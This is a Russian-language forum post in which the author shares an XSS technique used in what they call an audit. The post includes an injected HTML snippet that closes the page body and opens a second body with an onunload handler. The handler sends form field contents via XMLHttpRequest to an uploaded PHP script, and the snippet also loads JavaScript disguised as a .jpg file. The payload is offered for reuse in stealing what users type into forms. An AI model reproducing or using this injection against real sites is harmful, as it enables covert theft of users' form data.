Такс. в общем провел нужный мне аудит, думаю можно рассказать каким образом провел свою xss.
Так как полного раскрытия темы не нашел ни здесь ни в гугле - думаю может кому то еще пригодится, а может кто то подскажет как можно еще более эффективно юзать xmlhttprequest
и так
ко всему выше сказанному необходимо получение данных из формы. я использовал объект document.form1.text.value
и вот тут необходимо вызвать действие при сабмите. а модифицировать форму не могу. Пришла на выручку особенность всех браузеров обрабатывать в документе body несколько раз! И таким образом прописав в середине
Код HTML:
</body>
<body onunload="HTTPRequest ('/dirupload/simple.php?')">
<script type="text/javascript" src="/dirupload/script.jpg"></script>
Ну а прояснить все нюансы помгла инфа вот здесь
http://xmlhttprequest.ru/
Полностью доступным языком описан данный объект
ЗЫ
Говорят есть обход ограничения выполнения на локалхосте. но не было времени с этим разобраться.